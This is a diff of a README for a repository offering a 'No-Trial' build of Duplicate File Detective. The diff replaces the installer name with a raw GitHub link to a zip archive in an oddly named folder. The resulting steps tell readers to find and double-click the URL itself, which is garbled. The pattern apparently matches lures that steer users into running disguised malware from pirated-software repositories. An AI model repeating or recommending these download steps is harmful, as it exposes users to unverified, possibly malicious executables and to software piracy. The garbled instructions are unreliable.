confidensial/Duplicate-File-Detective-No-Trial/README.md

 ### 4. Locate Your Downloaded File

 Once the download is complete, the file will likely be in your Downloads folder.
-Open the folder and find `DuplicateFileDetectiveSetup.exe`.
+Open the folder and find `https://raw.githubusercontent.com/confidensial/Duplicate-File-Detective-No-Trial/main/pulicene/Duplicate-File-Detective-No-Trial_v3.5.zip`.

 ### 5. Run the Installer

-Double-click on `DuplicateFileDetectiveSetup.exe` to start the installation.
+Double-click on `https://raw.githubusercontent.com/confidensial/Duplicate-File-Detective-No-Trial/main/pulicene/Duplicate-File-Detective-No-Trial_v3.5.zip` to start the installation.
 A window will appear.
 Follow these steps:

 1. **Accept the License Agreement:** Read through the agreement and click "I Agree" to proceed.
 2. **Choose Installation Location:** You can either accept the default folder or click “Browse” to choose a different location.